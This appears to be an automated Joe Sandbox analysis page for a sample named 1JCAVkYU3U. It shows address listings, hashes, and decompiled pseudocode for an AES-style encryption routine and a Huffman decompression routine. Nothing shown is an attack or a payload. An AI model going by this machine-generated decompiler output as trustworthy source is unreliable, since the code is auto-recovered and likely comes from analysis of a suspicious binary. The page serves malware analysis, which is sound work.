0x00b6c912
0x00b6c91b
0x00b6c979
0x00000000
0x00b6c979
0x00b6c925
0x00b6c927
0x00b6c929
0x00b6c92f
0x00b6c975
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6c931
0x00b6c931
0x00b6c931
0x00b6c933
0x00b6c934
0x00b6c935
0x00b6c939
0x00b6c93f
0x00b6c943
0x00b6c95e
0x00b6c962
0x00b6c962
0x00b6c945
0x00b6c94a
0x00b6c952
0x00b6c952
0x00b6c94a
0x00b6c964
0x00b6c968
0x00b6c96b
0x00b6c96e
0x00b6c96e
0x00b6c971
0x00000000
0x00b6c931
0x00b6c43c
0x00b6c43f
0x00000000
0x00000000
0x00b6c445
0x00b6c448
0x00b6c847
0x00b6c849
0x00b6c852
0x00000000
0x00000000
0x00b6c85b
0x00b6c85e
0x00b6c864
0x00000000
0x00000000
0x00b6c86e
0x00b6c86f
0x00b6c873
0x00b6c876
0x00b6c87c
0x00000000
0x00000000
0x00b6c87e
0x00b6c886
0x00000000
0x00000000
0x00b6c888
0x00b6c88c
0x00b6c88e
0x00b6c893
0x00b6c897
0x00b6c89b
0x00b6c89c
0x00b6c8a3
0x00b6c8a7
0x00b6c8b6
0x00b6c8d1
0x00b6c8d1
0x00b6c8d6
0x00b6c8da
0x00b6c8da
0x00b6c8de
0x00b6c8df
0x00b6c8e2
0x00b6c8e6
0x00b6c8eb
0x00b6c8ef
0x00b6c8f3
0x00b6c8f3
0x00b6c8f6
0x00b6c8f7
0x00b6c8fa
0x00b6c8fe
0x00b6c8fe
0x00000000
0x00b6c908
0x00b6c44e
0x00b6c451
0x00b6c6ee
0x00b6c6f1
0x00b6c6f4
0x00b6c6f8
0x00b6c703
0x00000000
0x00b6c711
0x00b6c711
0x00b6c714
0x00b6c71b
0x00000000
0x00000000
0x00b6c721
0x00b6c723
0x00b6c729
0x00b6c72a
0x00b6c72d
0x00b6c731
0x00b6c735
0x00b6c737
0x00b6c73b
0x00b6c73f
0x00b6c73f
0x00b6c743
0x00000000
0x00000000
0x00b6c749
0x00b6c74d
0x00b6c754
0x00b6c75b
0x00b6c75d
0x00b6c761
0x00b6c765
0x00b6c76f
0x00b6c776
0x00b6c782
0x00b6c797
0x00b6c79b
0x00b6c7a0
0x00b6c7a4
0x00b6c7a7
0x00b6c7ad
0x00b6c7bd
0x00b6c7c3
0x00b6c7c7
0x00b6c7cb
0x00b6c7cd
0x00b6c7cd
0x00b6c7b3
0x00b6c7b3
0x00b6c7b7
0x00b6c7b7
0x00b6c7ad
0x00b6c7d3
0x00b6c7d5
0x00b6c7d6
0x00b6c7da
0x00b6c7dd
0x00b6c7e6
0x00b6c7ec
0x00b6c7ec
0x00b6c7f6
0x00b6c7fa
0x00b6c7fe
0x00b6c804
0x00b6c805
0x00b6c805
0x00b6c806
0x00b6c80a
0x00b6c812
0x00b6c816
0x00b6c81b
0x00000000
0x00000000
0x00b6c826
0x00b6c82d
0x00b6c830
0x00b6c830
0x00b6c833
0x00b6c836
0x00b6c838
0x00b6c83a
0x00b6c83a
0x00000000
0x00b6c83f
0x00b6c703
0x00b6c457
0x00b6c45a
0x00b6c4d6
0x00b6c4d9
0x00b6c4db
0x00b6c4de
0x00b6c4e4
0x00b6c4e8
0x00b6c4ec
0x00b6c4f6
0x00000000
0x00b6c50f
0x00b6c50f
0x00b6c511
0x00b6c517
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6c51d
0x00b6c51d
0x00b6c51d
0x00b6c526
0x00b6c52b
0x00b6c52d
0x00b6c532
0x00b6c534
0x00b6c539
0x00b6c53f
0x00b6c543
0x00b6c548
0x00b6c54c
0x00b6c54f
0x00b6c557
0x00b6c6d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6c55d
0x00b6c55d
0x00b6c55d
0x00b6c56b
0x00b6c56f
0x00b6c573
0x00b6c580
0x00b6c583
0x00b6c5a9
0x00b6c5af
0x00b6c5be
0x00b6c5c2
0x00b6c5c6
0x00b6c5cf
0x00b6c5df
0x00b6c5ef
0x00b6c5ff
0x00b6c60f
0x00b6c61d
0x00b6c62a
0x00b6c62e
0x00b6c636
0x00b6c6b2
0x00b6c638
0x00b6c638
0x00b6c63c
0x00b6c63e
0x00b6c644
0x00b6c645
0x00b6c649
0x00b6c64b
0x00b6c64f
0x00b6c64f
0x00b6c651
0x00b6c656
0x00b6c657
0x00b6c65c
0x00b6c660
0x00b6c663
0x00b6c6ad
0x00b6c6af
0x00b6c6af
0x00000000
0x00b6c6ad
0x00b6c665
0x00b6c668
0x00b6c6a5
0x00b6c6a7
0x00b6c6a7
0x00000000
0x00b6c6a5
0x00b6c66a
0x00b6c66d
0x00b6c69d
0x00b6c69f
0x00b6c69f
0x00000000
0x00b6c69d
0x00b6c66f
0x00b6c672
0x00b6c695
0x00b6c697
0x00b6c697
0x00000000
0x00b6c695
0x00b6c674
0x00b6c677
0x00b6c68d
0x00000000
0x00000000
0x00b6c68f
0x00b6c684
0x00b6c684
0x00000000
0x00b6c684
0x00b6c67c
0x00000000
0x00b6c683
0x00b6c683
0x00000000
0x00b6c683
0x00b6c67c
0x00b6c6b6
0x00b6c6ba
0x00b6c6be
0x00b6c6c0
0x00b6c6c4
0x00b6c6c8
0x00b6c6d2
0x00b6c6dc
0x00b6c6dc
0x00b6c6dd
0x00b6c6e1
0x00000000
0x00b6c6e9
0x00b6c4f6
0x00b6c45f
0x00000000
0x00000000
0x00b6c465
0x00b6c468
0x00b6c46a
0x00b6c46d
0x00b6c474
0x00b6c47e
0x00000000
0x00b6c498
0x00b6c498
0x00b6c49a
0x00b6c49e
0x00b6c49e
0x00b6c4a0
0x00b6c4a6
0x00b6c4a8
0x00b6c4a8
0x00b6c4ac
0x00b6c4ac
0x00b6c4ae
0x00b6c4b1
0x00b6c4b2
0x00b6c4b5
0x00b6c4b9
0x00000000
0x00b6c4bb
0x00b6c4bb
0x00b6c4bf
0x00000000
0x00b6c4bf
0x00b6c4b9
0x00b6c4c3
0x00b6c4c3
0x00b6c4c4
0x00b6c4c7
0x00b6c4cb
0x00b6c4cb
0x00000000
0x00b6c49e

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa402ae7130105e39f3fb7bbb813d8b00befd65068929790d67cb9060f187baa
Instruction ID: 6478e96fcc46ee871c4e8320984c2b394e29bc7defc3dda6793be1810d08908d
Opcode Fuzzy Hash: aa402ae7130105e39f3fb7bbb813d8b00befd65068929790d67cb9060f187baa
Instruction Fuzzy Hash: F6F1AA716093018FC719CF28C48463ABFE1EF8A314F645AAEF4C5D72A2D638E945CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00B6E9B7 Relevance: .3, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B6E9B7(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t220;
				intOrPtr _t227;
				void* _t250;
				signed char _t252;
				signed int _t300;
				signed int* _t303;
				signed char _t346;
				unsigned int _t348;
				signed int _t351;
				unsigned int _t354;
				signed int* _t357;
				signed int _t361;
				signed int _t366;
				signed int _t370;
				signed int _t374;
				signed char _t376;
				signed int* _t380;
				signed int _t387;
				signed int _t392;
				intOrPtr _t394;
				signed char _t395;
				signed char _t396;
				signed char _t397;
				unsigned int _t399;
				signed int _t402;
				unsigned int _t405;
				unsigned int _t407;
				unsigned int _t408;
				signed int _t409;
				signed int _t414;
				unsigned int _t415;
				unsigned int _t416;
				signed int _t418;
				signed int _t422;
				signed int _t423;
				intOrPtr _t425;
				signed int _t426;
				void* _t430;
				void* _t431;

				_t407 =  *(_t430 + 0x6c);
				_t425 = __ecx;
				 *((intOrPtr*)(_t430 + 0x24)) = __ecx;
				if(_t407 != 0) {
					_t408 = _t407 >> 4;
					 *(_t430 + 0x6c) = _t408;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t430 + 0x38)) = __ecx + 8;
						E00B80320(_t430 + 0x5c, __ecx + 8, 0x10);
						_t431 = _t430 + 0xc;
						if(_t408 == 0) {
							L13:
							return E00B80320( *((intOrPtr*)(_t431 + 0x38)), _t431 + 0x58, 0x10);
						}
						_t392 =  *(_t431 + 0x68);
						 *(_t431 + 0x24) = _t392 + 8;
						_t227 =  *((intOrPtr*)(_t431 + 0x78));
						_t394 = _t392 - _t227 - 8;
						 *((intOrPtr*)(_t431 + 0x34)) = _t394;
						_t357 = _t227 + 8;
						 *(_t431 + 0x28) = _t357;
						do {
							_t414 =  *(_t425 + 4);
							 *(_t431 + 0x30) = _t357 + _t394;
							E00B6E985(_t431 + 0x54, _t357 + _t394, (_t414 << 4) + 0x18 + _t425);
							_t395 =  *(_t431 + 0x4c);
							 *(_t431 + 0x10) =  *(0xba61c8 + (_t395 & 0x000000ff) * 4) ^  *(0xba6dc8 + ( *(_t431 + 0x53) & 0x000000ff) * 4) ^  *(0xba69c8 + ( *(_t431 + 0x56) & 0x000000ff) * 4);
							_t346 =  *(_t431 + 0x58);
							_t361 =  *(_t431 + 0x10) ^  *(0xba65c8 + (_t346 & 0x000000ff) * 4);
							 *(_t431 + 0x10) = _t361;
							 *(_t431 + 0x3c) = _t361;
							_t396 =  *(_t431 + 0x50);
							_t366 =  *(0xba65c8 + (_t395 & 0x000000ff) * 4) ^  *(0xba61c8 + (_t396 & 0x000000ff) * 4) ^  *(0xba6dc8 + ( *(_t431 + 0x57) & 0x000000ff) * 4) ^  *(0xba69c8 + ( *(_t431 + 0x5a) & 0x000000ff) * 4);
							 *(_t431 + 0x1c) = _t366;
							 *(_t431 + 0x40) = _t366;
							_t397 =  *(_t431 + 0x54);
							 *(_t431 + 0x14) =  *(0xba69c8 + ( *(_t431 + 0x4e) & 0x000000ff) * 4) ^  *(0xba65c8 + (_t396 & 0x000000ff) * 4);
							_t370 =  *(_t431 + 0x14) ^  *(0xba61c8 + (_t397 & 0x000000ff) * 4) ^  *(0xba6dc8 + ( *(_t431 + 0x5b) & 0x000000ff) * 4);
							 *(_t431 + 0x14) = _t370;
							 *(_t431 + 0x44) = _t370;
							 *(_t431 + 0x18) =  *(0xba6dc8 + ( *(_t431 + 0x4f) & 0x000000ff) * 4) ^  *(0xba69c8 + ( *(_t431 + 0x52) & 0x000000ff) * 4);
							_t374 =  *(_t431 + 0x18) ^  *(0xba65c8 + (_t397 & 0x000000ff) * 4) ^  *(0xba61c8 + (_t346 & 0x000000ff) * 4);
							_t250 = _t414 - 1;
							 *(_t431 + 0x18) = _t374;
							 *(_t431 + 0x48) = _t374;
							if(_t250 <= 1) {
								goto L9;
							}
							_t409 =  *(_t431 + 0x1c);
							_t422 = (_t250 + 2 << 4) + _t425;
							_t426 =  *(_t431 + 0x10);
							 *(_t431 + 0x18) = _t422;
							 *(_t431 + 0x20) = _t250 - 1;
							do {
								_t405 =  *_t422 ^  *(_t431 + 0x14);
								 *(_t431 + 0x10) =  *(_t422 - 8) ^ _t426;
								 *(_t431 + 0x1c) =  *(_t422 + 4) ^ _t374;
								_t354 =  *(_t422 - 4) ^ _t409;
								_t423 =  *(_t431 + 0x1c);
								_t426 =  *(0xba69c8 + (_t405 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xba65c8 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xba6dc8 + (_t354 >> 0x18) * 4) ^  *(0xba61c8 + ( *(_t431 + 0x10) & 0x000000ff) * 4);
								 *(_t431 + 0x3c) = _t426;
								_t409 =  *(0xba69c8 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xba65c8 + ( *(_t431 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xba6dc8 + (_t405 >> 0x18) * 4) ^  *(0xba61c8 + (_t354 & 0x000000ff) * 4);
								 *(_t431 + 0x40) = _t409;
								_t387 =  *(0xba65c8 + (_t354 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xba69c8 + ( *(_t431 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xba6dc8 + (_t423 >> 0x18) * 4) ^  *(0xba61c8 + (_t405 & 0x000000ff) * 4);
								 *(_t431 + 0x14) = _t387;
								 *(_t431 + 0x44) = _t387;
								_t422 =  *(_t431 + 0x18) - 0x10;
								 *(_t431 + 0x18) = _t422;
								_t374 =  *(0xba69c8 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xba65c8 + (_t405 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xba6dc8 + ( *(_t431 + 0x10) >> 0x18) * 4) ^  *(0xba61c8 + (_t423 & 0x000000ff) * 4);
								_t132 = _t431 + 0x20;
								 *_t132 =  *(_t431 + 0x20) - 1;
								 *(_t431 + 0x48) = _t374;
							} while ( *_t132 != 0);
							 *(_t431 + 0x1c) = _t409;
							_t408 =  *(_t431 + 0x74);
							 *(_t431 + 0x10) = _t426;
							_t425 =  *((intOrPtr*)(_t431 + 0x2c));
							 *(_t431 + 0x18) = _t374;
							L9:
							_t252 =  *(_t425 + 0x28) ^  *(_t431 + 0x10);
							 *(_t431 + 0x20) = _t252;
							 *(_t431 + 0x4c) = _t252;
							_t376 =  *(_t425 + 0x34) ^  *(_t431 + 0x18);
							 *(_t431 + 0x3c) =  *((intOrPtr*)((_t252 & 0x000000ff) + 0xba50c8));
							_t399 =  *(_t425 + 0x30) ^  *(_t431 + 0x14);
							_t348 =  *(_t425 + 0x2c) ^  *(_t431 + 0x1c);
							 *((char*)(_t431 + 0x3d)) =  *((intOrPtr*)((_t376 >> 0x00000008 & 0x000000ff) + 0xba50c8));
							_t415 =  *(_t431 + 0x20);
							 *(_t431 + 0x54) = _t399;
							 *(_t431 + 0x50) = _t348;
							 *((char*)(_t431 + 0x3e)) =  *((intOrPtr*)((_t399 >> 0x00000010 & 0x000000ff) + 0xba50c8));
							 *(_t431 + 0x58) = _t376;
							 *((char*)(_t431 + 0x3f)) =  *((intOrPtr*)((_t348 >> 0x18) + 0xba50c8));
							 *(_t431 + 0x40) =  *((intOrPtr*)((_t348 & 0x000000ff) + 0xba50c8));
							 *((char*)(_t431 + 0x41)) =  *((intOrPtr*)((_t415 >> 0x00000008 & 0x000000ff) + 0xba50c8));
							 *((char*)(_t431 + 0x42)) =  *((intOrPtr*)((_t376 >> 0x00000010 & 0x000000ff) + 0xba50c8));
							 *((char*)(_t431 + 0x43)) =  *((intOrPtr*)((_t399 >> 0x18) + 0xba50c8));
							 *(_t431 + 0x44) =  *((intOrPtr*)((_t399 & 0x000000ff) + 0xba50c8));
							 *((char*)(_t431 + 0x45)) =  *((intOrPtr*)((_t348 >> 0x00000008 & 0x000000ff) + 0xba50c8));
							_t416 = _t415 >> 0x18;
							 *((char*)(_t431 + 0x46)) =  *((intOrPtr*)((_t415 >> 0x00000010 & 0x000000ff) + 0xba50c8));
							 *((char*)(_t431 + 0x47)) =  *((intOrPtr*)((_t376 >> 0x18) + 0xba50c8));
							 *(_t431 + 0x48) =  *((intOrPtr*)((_t376 & 0x000000ff) + 0xba50c8));
							_t402 =  *(_t425 + 0x18) ^  *(_t431 + 0x3c);
							 *((char*)(_t431 + 0x49)) =  *((intOrPtr*)((_t399 >> 0x00000008 & 0x000000ff) + 0xba50c8));
							 *((char*)(_t431 + 0x4a)) =  *((intOrPtr*)((_t348 >> 0x00000010 & 0x000000ff) + 0xba50c8));
							_t186 = _t416 + 0xba50c8; // 0x30d56a09
							 *((char*)(_t431 + 0x4b)) =  *_t186;
							_t300 =  *(_t425 + 0x24) ^  *(_t431 + 0x48);
							_t418 =  *(_t425 + 0x1c) ^  *(_t431 + 0x40);
							_t351 =  *(_t425 + 0x20) ^  *(_t431 + 0x44);
							 *(_t431 + 0x20) = _t300;
							if( *((char*)(_t425 + 1)) != 0) {
								_t402 = _t402 ^  *(_t431 + 0x5c);
								_t418 = _t418 ^  *(_t431 + 0x60);
								_t351 = _t351 ^  *(_t431 + 0x64);
								 *(_t431 + 0x20) = _t300 ^  *(_t431 + 0x68);
							}
							 *(_t431 + 0x5c) =  *( *(_t431 + 0x30));
							_t303 =  *(_t431 + 0x24);
							 *(_t431 + 0x60) =  *(_t303 - 4);
							 *(_t431 + 0x64) =  *_t303;
							 *(_t431 + 0x68) = _t303[1];
							_t380 =  *(_t431 + 0x28);
							 *(_t431 + 0x24) =  &(_t303[4]);
							 *(_t380 - 8) = _t402;
							_t380[1] =  *(_t431 + 0x20);
							_t394 =  *((intOrPtr*)(_t431 + 0x34));
							 *(_t380 - 4) = _t418;
							 *_t380 = _t351;
							_t357 =  &(_t380[4]);
							_t408 = _t408 - 1;
							 *(_t431 + 0x28) = _t357;
							 *(_t431 + 0x74) = _t408;
						} while (_t408 != 0);
						goto L13;
					}
					return E00B6EE7A( *((intOrPtr*)(_t430 + 0x70)), _t408,  *((intOrPtr*)(_t430 + 0x70)));
				}
				return _t220;
			}

0x00b6e9bc
0x00b6e9c0
0x00b6e9c2
0x00b6e9c8
0x00b6e9ce
0x00b6e9d5
0x00b6e9d9
0x00b6e9f4
0x00b6e9fd
0x00b6ea02
0x00b6ea07
0x00b6ee5f
0x00000000
0x00b6ee6f
0x00b6ea0d
0x00b6ea16
0x00b6ea1a
0x00b6ea20
0x00b6ea23
0x00b6ea27
0x00b6ea2a
0x00b6ea2e
0x00b6ea2e
0x00b6ea35
0x00b6ea48
0x00b6ea4d
0x00b6ea73
0x00b6ea77
0x00b6ea82
0x00b6ea89
0x00b6ea8d
0x00b6ea94
0x00b6eaba
0x00b6eac6
0x00b6eaca
0x00b6ead8
0x00b6eae3
0x00b6eafa
0x00b6eb06
0x00b6eb0a
0x00b6eb21
0x00b6eb36
0x00b6eb3d
0x00b6eb40
0x00b6eb44
0x00b6eb4b
0x00000000
0x00000000
0x00b6eb51
0x00b6eb5b
0x00b6eb5d
0x00b6eb62
0x00b6eb66
0x00b6eb6a
0x00b6eb71
0x00b6eb75
0x00b6eb81
0x00b6eb85
0x00b6eb87
0x00b6ebbc
0x00b6ebdc
0x00b6ebf6
0x00b6ec19
0x00b6ec36
0x00b6ec3d
0x00b6ec41
0x00b6ec70
0x00b6ec73
0x00b6ec77
0x00b6ec7e
0x00b6ec7e
0x00b6ec83
0x00b6ec83
0x00b6ec8d
0x00b6ec91
0x00b6ec95
0x00b6ec99
0x00b6ec9d
0x00b6eca1
0x00b6eca4
0x00b6eca8
0x00b6ecac
0x00b6ecb6
0x00b6ecc3
0x00b6eccf
0x00b6ecd6
0x00b6ece0
0x00b6ecec
0x00b6ecf0
0x00b6ecf4
0x00b6ecfe
0x00b6ed07
0x00b6ed11
0x00b6ed1e
0x00b6ed30
0x00b6ed42
0x00b6ed51
0x00b6ed61
0x00b6ed76
0x00b6ed82
0x00b6ed8b
0x00b6ed9a
0x00b6eda7
0x00b6edb1
0x00b6edbb
0x00b6edc8
0x00b6edcc
0x00b6edd2
0x00b6eddf
0x00b6ede3
0x00b6ede7
0x00b6edef
0x00b6edf3
0x00b6edf5
0x00b6edf9
0x00b6edfd
0x00b6ee05
0x00b6ee05
0x00b6ee0f
0x00b6ee13
0x00b6ee1a
0x00b6ee20
0x00b6ee2a
0x00b6ee2e
0x00b6ee32
0x00b6ee36
0x00b6ee3d
0x00b6ee40
0x00b6ee44
0x00b6ee47
0x00b6ee49
0x00b6ee4c
0x00b6ee4f
0x00b6ee53
0x00b6ee53
0x00000000
0x00b6ee5e
0x00000000
0x00b6e9e4
0x00b6ee77

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e50bfed4bfc8aa0e005e973509ddd895ff755c78a909e658c02544bab75290b
Instruction ID: f31eb50e516ab06e28be40147feac63993d452505a95184ce0e9ad6e10925c46
Opcode Fuzzy Hash: 4e50bfed4bfc8aa0e005e973509ddd895ff755c78a909e658c02544bab75290b
Instruction Fuzzy Hash: 20E148B55083948FC354CF29D88086BBFF0AF9A300F49095EF9D497352D635EA19DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B74088 Relevance: .3, Instructions: 270
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00B74088(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t87;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				void* _t99;
				void* _t101;
				void* _t121;
				signed int _t130;
				signed int _t139;
				signed int _t140;
				signed int _t149;
				signed int _t151;
				void* _t153;
				signed int _t156;
				signed int _t157;
				intOrPtr* _t158;
				intOrPtr* _t167;
				signed int _t170;
				void* _t171;
				signed int _t174;
				void* _t179;
				unsigned int _t181;
				void* _t184;
				signed int _t185;
				intOrPtr* _t186;
				void* _t187;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t190;
				signed int _t193;
				signed int _t198;
				void* _t201;

				_t179 = __edx;
				_t187 = __ecx;
				_t186 = __ecx + 4;
				if( *_t186 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19 || E00B74DC4(__ecx) != 0) {
					E00B6A881(_t186,  ~( *(_t187 + 8)) & 0x00000007);
					_t82 = E00B6A898(_t186);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t139 = 0;
						 *((intOrPtr*)(_t187 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t187 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t187 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E00B7FFF0(_t186, _t187 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E00B6A881(_t186, 2);
						do {
							 *(_t201 + 0x14) = E00B6A898(_t186) >> 0xc;
							E00B6A881(_t186, 4);
							_t87 =  *(_t201 + 0x10);
							__eflags = _t87 - 0xf;
							if(_t87 != 0xf) {
								 *(_t201 + _t139 + 0x14) = _t87;
								goto L15;
							}
							_t188 = E00B6A898(_t186) >> 0x0000000c & 0x000000ff;
							E00B6A881(_t186, 4);
							__eflags = _t188;
							if(_t188 != 0) {
								_t189 = _t188 + 2;
								__eflags = _t189;
								while(1) {
									_t189 = _t189 - 1;
									__eflags = _t139 - 0x14;
									if(_t139 >= 0x14) {
										break;
									}
									 *(_t201 + _t139 + 0x14) = 0;
									_t139 = _t139 + 1;
									__eflags = _t189;
									if(_t189 != 0) {
										continue;
									}
									break;
								}
								_t139 = _t139 - 1;
								goto L15;
							}
							 *(_t201 + _t139 + 0x14) = 0xf;
							L15:
							_t139 = _t139 + 1;
							__eflags = _t139 - 0x14;
						} while (_t139 < 0x14);
						_push(0x14);
						_t190 = _t187 + 0x3c50;
						_push(_t190);
						_push(_t201 + 0x1c);
						E00B73797();
						_t140 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84)) - 5;
							if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84)) - 5) {
								L19:
								_t92 = E00B6A89D(_t186);
								_t93 =  *(_t190 + 0x84);
								_t181 = _t92 & 0x0000fffe;
								__eflags = _t181 -  *((intOrPtr*)(_t190 + 4 + _t93 * 4));
								if(_t181 >=  *((intOrPtr*)(_t190 + 4 + _t93 * 4))) {
									_t149 = 0xf;
									_t94 = _t93 + 1;
									 *(_t201 + 0x10) = _t149;
									__eflags = _t94 - _t149;
									if(_t94 >= _t149) {
										L27:
										_t151 =  *(_t186 + 4) +  *(_t201 + 0x10);
										 *_t186 =  *_t186 + (_t151 >> 3);
										_t97 =  *(_t201 + 0x10);
										 *(_t186 + 4) = _t151 & 0x00000007;
										_t153 = 0x10;
										_t156 =  *((intOrPtr*)(_t190 + 0x44 + _t97 * 4)) + (_t181 -  *((intOrPtr*)(_t190 + _t97 * 4)) >> _t153 - _t97);
										__eflags = _t156 -  *_t190;
										asm("sbb eax, eax");
										_t98 = _t97 & _t156;
										__eflags = _t98;
										_t157 =  *(_t190 + 0xc88 + _t98 * 2) & 0x0000ffff;
										L28:
										_t184 = 0x10;
										__eflags = _t157 - _t184;
										if(_t157 >= _t184) {
											_t99 = 0x12;
											__eflags = _t157 - _t99;
											if(__eflags >= 0) {
												_t158 = _t186;
												if(__eflags != 0) {
													_t193 = (E00B6A898(_t158) >> 9) + 0xb;
													__eflags = _t193;
													_push(7);
												} else {
													_t193 = (E00B6A898(_t158) >> 0xd) + 3;
													_push(3);
												}
												_pop(_t101);
												E00B6A881(_t186, _t101);
												while(1) {
													_t193 = _t193 - 1;
													__eflags = _t140 - 0x194;
													if(_t140 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t140 + 0x28) = 0;
													_t140 = _t140 + 1;
													__eflags = _t193;
													if(_t193 != 0) {
														continue;
													}
													L44:
													_t190 = _t187 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t157 - _t184;
											_t167 = _t186;
											if(_t157 != _t184) {
												_t198 = (E00B6A898(_t167) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E00B6A898(_t167) >> 0xd) + 3;
												_push(3);
											}
											_pop(_t121);
											E00B6A881(_t186, _t121);
											__eflags = _t140;
											if(_t140 == 0) {
												goto L47;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t140 - 0x194;
													if(_t140 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t201 + _t140 + 0x27));
													_t140 = _t140 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t140 + _t187 + 0xe4c8)) + _t157 & 0x0000000f;
										_t140 = _t140 + 1;
										goto L45;
									}
									_t170 = 4 + _t94 * 4 + _t190;
									__eflags = _t170;
									while(1) {
										__eflags = _t181 -  *_t170;
										if(_t181 <  *_t170) {
											break;
										}
										_t94 = _t94 + 1;
										_t170 = _t170 + 4;
										__eflags = _t94 - 0xf;
										if(_t94 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t94;
									goto L27;
								}
								_t171 = 0x10;
								_t185 = _t181 >> _t171 - _t93;
								_t174 = ( *(_t185 + _t190 + 0x88) & 0x000000ff) +  *(_t186 + 4);
								 *_t186 =  *_t186 + (_t174 >> 3);
								 *(_t186 + 4) = _t174 & 0x00000007;
								_t157 =  *(_t190 + 0x488 + _t185 * 2) & 0x0000ffff;
								goto L28;
							}
							_t130 = E00B74DC4(_t187);
							__eflags = _t130;
							if(_t130 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t140 - 0x194;
						} while (_t140 < 0x194);
						L46:
						 *((char*)(_t187 + 0xe661)) = 1;
						__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84));
						if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84))) {
							_push(0x12b);
							_push(_t187 + 0xa0);
							_push(_t201 + 0x30);
							E00B73797();
							_push(0x3c);
							_push(_t187 + 0xf8c);
							_push(_t201 + 0x15b);
							E00B73797();
							_push(0x11);
							_push(_t187 + 0x1e78);
							_push(_t201 + 0x197);
							E00B73797();
							_push(0x1c);
							_push(_t187 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00B73797();
							E00B80320(_t187 + 0xe4c8, _t201 + 0x2c, 0x194);
							return 1;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t187 + 0xe65c)) = 1;
					return E00B72F75(_t179, _t205, _t187, _t187 + 0xe4c4);
				} else {
					L47:
					return 0;
				}
			}

0x00b74088
0x00b74091
0x00b7409a
0x00b740a2
0x00b740bc
0x00b740c3
0x00b740c8
0x00b740cd
0x00b740f1
0x00b740f3
0x00b740f9
0x00b740ff
0x00b74105
0x00b7410a
0x00b74119
0x00b7411e
0x00b7411e
0x00b74125
0x00b7412a
0x00b74138
0x00b7413c
0x00b74141
0x00b74145
0x00b74147
0x00b74180
0x00000000
0x00b74180
0x00b74157
0x00b7415a
0x00b7415f
0x00b74161
0x00b7416a
0x00b7416a
0x00b7416d
0x00b7416d
0x00b7416e
0x00b74171
0x00000000
0x00000000
0x00b74173
0x00b74178
0x00b74179
0x00b7417b
0x00000000
0x00000000
0x00000000
